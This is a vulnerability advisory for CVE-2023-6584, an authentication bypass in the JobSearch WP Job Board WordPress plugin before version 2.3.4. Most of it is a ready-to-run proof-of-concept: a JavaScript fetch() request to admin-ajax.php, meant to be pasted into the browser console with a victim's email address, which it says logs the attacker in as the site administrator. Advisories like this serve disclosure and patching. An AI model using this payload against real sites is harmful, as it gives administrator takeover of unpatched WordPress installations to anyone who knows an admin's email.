JobSearch WP Job Board < 2.3.4 – Authentication Bypass | CVE 2023-6584

Description

The plugin does not prevent attackers from logging-in as any users with the only knowledge of that user's email address.

Proof of Concept

Browse to the site, paste the following in your browser's console (replace the email address with that site's administrator's email address):

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: new URLSearchParams({
        'action': 'jobsearch_facebook_get_soc_login_url',
        'user_data': JSON.stringify({
            "id": Math.random()*1000,
            "email": "user@example.com",
        })
    })
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));

Then access /wp-admin, and notice you're logged-in as an admin.